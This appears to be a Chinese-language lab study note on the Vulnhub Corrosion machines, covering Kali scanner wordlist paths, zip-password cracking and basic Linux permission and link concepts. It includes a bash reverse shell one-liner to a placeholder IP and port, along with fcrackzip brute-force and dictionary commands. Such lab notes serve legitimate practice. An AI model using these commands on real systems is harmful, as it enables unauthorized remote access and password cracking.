本章靶场:Corrosion系列
kali上的目录扫描字典
经过几次vulnhub打靶后发现kali上的目录扫描器可谓是五花八门,一些靶场甚至会出现没有使用指定扫描器就没有正确结果的情况
以下是整理的一些常用字典目录,当然可能有疏漏的地方,但也足以应付大部分场景
#除了默认扫描外,绝对目录均为/usr
dirsearch默认扫描
nikto默认扫描
../share/dirb
../share/dirbuster
../wordlist
Bash -i
这个参数的作用是创建一个新的bash交互
但真正实用的是下面这句反弹shell
bash -i >& /dev/tcp/IP地址/端口 0>&1
具体分析可以看这里
fcrackzip
这是一个压缩包密码爆破工具。可以使用自定义字符组合
fcrackzip -b -c 'aA1' -l 1-10 -u 123lybbn.zip
-b 表示使用暴利破解的方式
-c ‘aA1’ 表示使用大小写字母和数字混合破解的方式
-l 1-10 表示需要破解的密码长度为1到10位
-u 表示只显示破解出来的密码,其他错误的密码不显示出
fcrackzip -D -p lybbnpass.txt -u 123lybbn.zip
-D 表示要使用字典破解
-p 表示要使用那个字典破解
nano
我自己本人经常死脑筋只会用vim或者vi来修改文件,但其实很多靶机都会有这个坑,就是没有vi系列,只能用nano
UID、GID、EUID、EGID、SUID、SGID
内容比较多,简单说一下
UID是当前实际用户,GID是当前用户组,EUID是文件有效用户,EGID是文件有效用户组
而SUID和SGID更像是设置“全局变量”(其实我也还不太理解,因为暂时没怎么用到),感兴趣的可以看这里
硬链接和软链接
简单来说,在linux文件结构中,硬链接更像是一个“实时同步”,并且即便源文件被删除了也并不影响同步文件的读取。而软链接可以理解成windows系统下的快捷方式。更多细节可以看这里